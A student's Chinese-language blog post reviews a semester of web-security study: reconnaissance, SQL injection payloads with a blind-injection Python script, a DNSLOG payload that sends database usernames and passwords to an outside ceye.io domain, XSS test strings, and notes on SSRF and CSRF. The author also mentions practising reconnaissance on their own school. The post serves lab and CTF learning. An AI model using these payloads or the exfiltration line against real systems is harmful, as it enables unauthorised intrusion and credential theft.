<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="时间总是最珍贵的东西，浑浑噩噩的一下子就又一个学期过了大半有余。 下面对这段时间学习的知识进行一些总结：">
<meta property="og:type" content="article">
<meta property="og:title" content="对这段时间的总结">
<meta property="og:url" content="http://yoursite.com/2020/11/12/对这段时间的总结/index.html">
<meta property="og:site_name" content="Welcome to my blogs!">
<meta property="og:description" content="时间总是最珍贵的东西，浑浑噩噩的一下子就又一个学期过了大半有余。 下面对这段时间学习的知识进行一些总结：">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://yoursite.com/image/city.png">
<meta property="og:image" content="http://yoursite.com/image/BNSLOG.png">
<meta property="og:updated_time" content="2020-11-12T11:24:43.007Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="对这段时间的总结">
<meta name="twitter:description" content="时间总是最珍贵的东西，浑浑噩噩的一下子就又一个学期过了大半有余。 下面对这段时间学习的知识进行一些总结：">
<meta name="twitter:image" content="http://yoursite.com/image/city.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/11/12/对这段时间的总结/">





  <title>对这段时间的总结 | Welcome to my blogs!</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Welcome to my blogs!</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/11/12/对这段时间的总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xqhm">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/1.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Welcome to my blogs!">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">对这段时间的总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-11-12T17:54:46+08:00">
                2020-11-12
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>
时间总是最珍贵的东西，浑浑噩噩的一下子就又一个学期过了大半有余。
下面对这段时间学习的知识进行一些总结：
</p>
<a id="more"></a>

<h2>一、信息收集</h2>
    <p>信息收集应该是进行所有渗透的第一步也是关键一步。
对于信息收集这一模块。我以学校为目标进行练习，嘿嘿。
</p>
<p>
信息收集，怎么说呢把目标看作一个城市，城市有很多入口，里面有各种各样的东西，</p>

<p><img src="/image/city.png" alt></p>
<p>主站---大门</p>
<p>子站---校门</p>
<p>端口---一些窗户/下水道？</p>
<p>后台---暗门</p>
<p>网站架构/cms---设计图</p>
<p>有了这些比喻，可能会比较好理解，这也是大门不给走小门，也就是为什么要收集子域名、端口的原因。
比如：我收集的学校信息，主站就开放了443、80端口基本没啥搞头，但是教务系统的时候发现了，21和1433端口这就有搞头了。</p>
嗯，，，具体怎么收集信息，也就这样了
<ul>
<li>收集域名信息：whois、https://fofa.so/、天眼查</li>
<li>收集敏感信息如：谷歌site;edu.cn intext:后台、burp suite的repeater同样可以收集到服务器的相关信息</li>
<li>收集子域名：layer子域名挖掘机、谷歌、fofa、</li>
<li>端口扫描：端口扫描工具、nmap</li>
<li>找真实的ip：直接ping它查看是否使用cdn、https//asm.ca.com/en/ping.php、https://www.netcraft.com</li>
<li>收集敏感目录文件：DirBuster、御剑后台扫描</li>
</ul>
社工。。。嗯...额，不适合我
<h2>二、漏洞环境的搭建</h2>
phpstudy+sqli-lab+xssplatform+DVWA
或
WAMP+sqli-lab+xssplatform+DVWA

<p>XSS练习攻略ctf秀平台<br><a href="https://ctf.show/challenges" target="_blank" rel="noopener">https://ctf.show/challenges</a></p>
<h2>三、sql注入学习总结</h2>
<p>最关键的是判断是否是sql注入，注入点是在哪吧。这两个知道了，就可以进行常规和非常规注入测试了。
接下来就是注入类型然后进行注入了</p>

<h3>1、布尔型注入---sqli-lab的less8</h3>
<p>求长度' and length(database())>8 --+
数据库名拼接 ' and (ascii(substr(database(),1,1)))>115 --+
</p>
脚本攻击
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import os</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 此函数先判断数据库长度</span><br><span class="line">def length(url, str):</span><br><span class="line">    num = 1</span><br><span class="line">    while True:</span><br><span class="line">        str_num = &apos;%d&apos; % num</span><br><span class="line">        len_url = url + &quot;&apos; and (select length(database()) = &quot; + str_num + &quot;)--+&quot;</span><br><span class="line">        response = requests.get(len_url)</span><br><span class="line">        if str in response.text:</span><br><span class="line">            print(&quot;数据库长度为：%s&quot; % str_num)</span><br><span class="line">            content(url, str, num)</span><br><span class="line">            break</span><br><span class="line">        else:</span><br><span class="line">            num = num + 1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 此函数判断字符串具体的内容</span><br><span class="line">def content(url, str, num):</span><br><span class="line">    s = [&apos;1&apos;, &apos;2&apos;, &apos;3&apos;, &apos;4&apos;, &apos;5&apos;, &apos;6&apos;, &apos;7&apos;, &apos;8&apos;, &apos;9&apos;, &apos;0&apos;, &apos;a&apos;, &apos;b&apos;, &apos;c&apos;, &apos;d&apos;, &apos;e&apos;, &apos;f&apos;, &apos;g&apos;, &apos;h&apos;, &apos;i&apos;, &apos;j&apos;, &apos;k&apos;, &apos;l&apos;,</span><br><span class="line">         &apos;m&apos;, &apos;n&apos;, &apos;o&apos;, &apos;p&apos;, &apos;q&apos;, &apos;r&apos;, &apos;s&apos;, &apos;t&apos;, &apos;u&apos;, &apos;v&apos;, &apos;w&apos;, &apos;x&apos;, &apos;y&apos;, &apos;z&apos;]</span><br><span class="line">    con_num = 1</span><br><span class="line">    while con_num &lt;= num:</span><br><span class="line">        str_num = &apos;%d&apos; % con_num</span><br><span class="line">        for i in s:</span><br><span class="line">            con_url = url + &quot;&apos; and (select mid(database(),&quot; + str_num + &quot;,1)=&apos;&quot; + i + &quot;&apos;)--+&quot;</span><br><span class="line">            response = requests.get(con_url)</span><br><span class="line">            if str in response.text:</span><br><span class="line">                fwrite(i)</span><br><span class="line">        con_num = con_num + 1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 此函数对字符串的内容做记录并输出</span><br><span class="line">def fwrite(i):</span><br><span class="line">    # fp = open(&quot;cache.txt&quot;,&apos;a&apos;)</span><br><span class="line">    # fp.write(i)</span><br><span class="line">    # fp.close()</span><br><span class="line">    print(i)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">    url = &quot;http://192.168.248.133/sql/Less-5/?id=1&quot;</span><br><span class="line">    response = requests.get(url)</span><br><span class="line">    str = &quot;You are in...........&quot;</span><br><span class="line">    if str in response.text:</span><br><span class="line">        length(url, str)</span><br><span class="line">    else:</span><br><span class="line">        print(&quot;请输入正确的地址&quot;)</span><br></pre></td></tr></table></figure>

<h3>2、报错注入 sqli-lab的less1-6 11-14 17-24</h3>

<p>报错函数如下</p>
<ul>
<li>
updatexml():mysql对xml文档数据进行查询和修改的xpath函数
</li>
<li>
extractvalue()：mysql对xml文档数据进行查询的xpath函数
</li>
<li>
floor():mysql中用来取整的函数
</li>
<li>
exp():此函数返回e(自然对数的底)指数X的幂值
</li>
</ul>

<p>语法updatexml(目标xml文档，xml路径，更新的内容)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select username from security.user where id=1 and (updatexml(1,’/xx/xx’,’anything’))</span><br><span class="line">&apos;and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))--+ #0x7e 是“~”</span><br></pre></td></tr></table></figure>

<h3>3、联合查询注入</h3>
<p>数字型
 union select 1,2,3判断回显位</p>
<p>字符型
' and 1=2 union select 1,2,3-- qwe</p>
<h3>4、时间盲注</h3>
<p>延时注入
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
sleep()：休眠多少秒
' and sleep(5)-- qwe //延时了5秒，证明执行成功了。</p>
<p>猜当前数据库：
    1. 
' and if(length(database())>8,1,sleep(5))-- qwe数据库长度大于8时延时了5秒，数据库名是长度为8的字符串。
</p>


<h3>5、二次注入 sqli-lab less24</h3>
<p>只要在注册的时候 用admin ‘#注册     再去看数据库user里的会发现 有admin ’# 这个东西
然后,就看我们修改时的那个原码了
直接用admin ‘#登录，然后改密码 直接逮住 完事
原理：https://www.sqlsec.com/2020/05/sqlilabs.html#toc-heading-49
比较靠谱</p>
<h3>6、DNSLOG注入 封神台-辛巴猫舍 sqli-lab less-38</h3>
<p>DNSlog注入应用场景
sql注入的盲注、无回显的命令执行、无回显的SSRF</p>
<p>
DNSlog注入原理
有一个可以配置的域名(比如：ceye.io)，然后通过代理商设置域名(ceye.io)的 nameserver 为自己的服务器 A，
然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上，这时就能够实时地监控域名查询请求了，</p>

<p><img src="/image/BNSLOG.png" alt></p>
<h4>DNSLOG平台</h4>
<p>
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
</p>

<h4>DNSlog需要条件：</h4>
<p>
MySQL 开启 load_file()
DNSLog 平台 （Hyuga、CEYE）
Windows 平台
</p>
<p>
`改成分配我们的域名：CONCAT：字符串拼接函数 中间的select是一个子查询，假如root用户的密码是root，那么这条语句就等同于 SELECT LOAD_FILE('\\\\root.75icr7.ceye.io\\abc');
payload(我失败了)：
?id=1';select load_file(concat('\\\\',(select hex(concat_ws('~',username,password)) from users limit 0,1),'.gvc791.ceye.io\\abc'))--+

</p><p>and(SELECT LOAD_FILE(CONCAT(‘\\‘,(SELECT database()),’.75icr7.ceye.io\abc’)))</p><br><h4>除此之外还有</h4><p></p>
<p>
宽字节注入 sqli-lab less-32：用%df 吃掉 源码里的\，
堆叠注入 sqli-lab less-38：?id=1';insert into users(username,password) values ('hello','world');
其实用上面给的py也是可以用，稍微改一下就行</p>

<h2>四、xss攻击</h2>
<p>
xss相对于我来说比较简单记忆，其实，关键还是判断xss攻击点在哪，再进行攻击就会比较简单了
找到测试点后，一般都会进行xss的测试语句进行测试：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br><span class="line">&lt;img src=x onerror=alert(1)&gt;</span><br><span class="line">&lt;svg onload=alert(1)&gt;</span><br><span class="line">&lt;a href=javascript:alert(1)&gt;</span><br></pre></td></tr></table></figure>
<p>
绕过方式：
主动闭合标签实现注入代码
大小写绕过
双写
等等。。。主要靠经验吧
</p>
<h2>五、SSRF</h2>
<p>
可能也是我影响比较深刻的一个了。在参加字节跳动高校赛的时候，第一道题就是ssrf+的题，没做出来
在过后就去找了一个类型的题做，
最重要的是判断是否存在ssrf漏洞（用自己的vps开放端口进行测试）嗯......其实还是得用实例来总结会比较好，2020ByteCTF初赛官方Writeup！web题的easyscrapy https://bycsec.top/2020/10/26/ByteCTF2020-easyscrapy/
ctfshow的 https://ctf.show/challenges
</p>
<h2>六、CSRF</h2>
<p>额，我偷懒了，我是从bibi那学的：https://www.bilibili.com/video/BV1UQ4y1N7aV
感觉他讲的应该是比我好很多</p>
<h2>七、关于一些工具总结</h2>
<p>
讲真工具不熟练，因为还是实践过少。
</p>
<p>
不过，工具一般会扯到很多命令的比如metasploit单单讲这个的就很厚，还有powershell
nmap？
认真的记了几波，发现还是记不牢。请教大佬，很多要知道有这回事，嗯，，，就是该记的还是要记，也不指望全部记住
不过，以后遇到要能想起来，然后去查
</p>
<h1>总结：</h1>
<p>
    其实吧，看完《web安全攻防》、还是攻略完sqli-lab、还是攻略了ctfshow的xss挑战，其实更多的是知道有这回事在真实的题目应用上面却还是不足，在面临真正的ctf比赛试题或者平台练习的时候还是会比较脑袋空白的，其实就是经验不足导致的！这个确实是短板，书上、论坛看的再多也是无法得到的。</p>
<p>  在这段时间里，学习过程中，讲真我并没有像很多人那样真正的说一撸就撸到很晚，我比较自满吧，总是在做完一些事的时候，会有点自满（其实做的不多）学完某个知识点的时候也是（到真正去做题的时候其实也是没有彻底掌握），懒惰、容易自满、没有更多的实践经验、见识少、忘性大是我现在的缺点吧</p>
<h2>计划</h2>
<ul>
<li>坚持完成每周更新bolg</li>
<li>每周都必须攻略ctf平台</li>
<li>坚持在不是满课的情况下学习《ctf成长之路》</li>
<li>不要自满、投入更多的时间</li>
</ul>
<span>引用一句不知道哪位名人的话：“你如果每天都很难受，那么你每天都会成长，当你回过头来发现，你必定会恍然大悟自己的难受是有多么值得。”（其实我也不知道是不是这样，忘性大）</span>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/11/10/ctfshow-xss/" rel="next" title="ctfshow-xss">
                <i class="fa fa-chevron-left"></i> ctfshow-xss
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/02/04/打造属于自己的搜索引擎/" rel="prev" title="打造属于自己的搜索引擎（一）">
                打造属于自己的搜索引擎（一） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/1.gif" alt="xqhm">
            
              <p class="site-author-name" itemprop="name">xqhm</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">categories</span>
                
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">1.</span> <span class="nav-text">一、信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">2.</span> <span class="nav-text">二、漏洞环境的搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">3.</span> <span class="nav-text">三、sql注入学习总结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.1.</span> <span class="nav-text">1、布尔型注入---sqli-lab的less8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.2.</span> <span class="nav-text">2、报错注入 sqli-lab的less1-6 11-14 17-24</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.3.</span> <span class="nav-text">3、联合查询注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.4.</span> <span class="nav-text">4、时间盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.5.</span> <span class="nav-text">5、二次注入 sqli-lab less24</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#null"><span class="nav-number">3.6.</span> <span class="nav-text">6、DNSLOG注入 封神台-辛巴猫舍 sqli-lab less-38</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">3.6.1.</span> <span class="nav-text">DNSLOG平台</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">3.6.2.</span> <span class="nav-text">DNSlog需要条件：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#null"><span class="nav-number">3.6.3.</span> <span class="nav-text">除此之外还有</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">4.</span> <span class="nav-text">四、xss攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">5.</span> <span class="nav-text">五、SSRF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">6.</span> <span class="nav-text">六、CSRF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">7.</span> <span class="nav-text">七、关于一些工具总结</span></a></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#null"><span class="nav-number"></span> <span class="nav-text">总结：</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#null"><span class="nav-number">1.</span> <span class="nav-text">计划</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xqhm</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
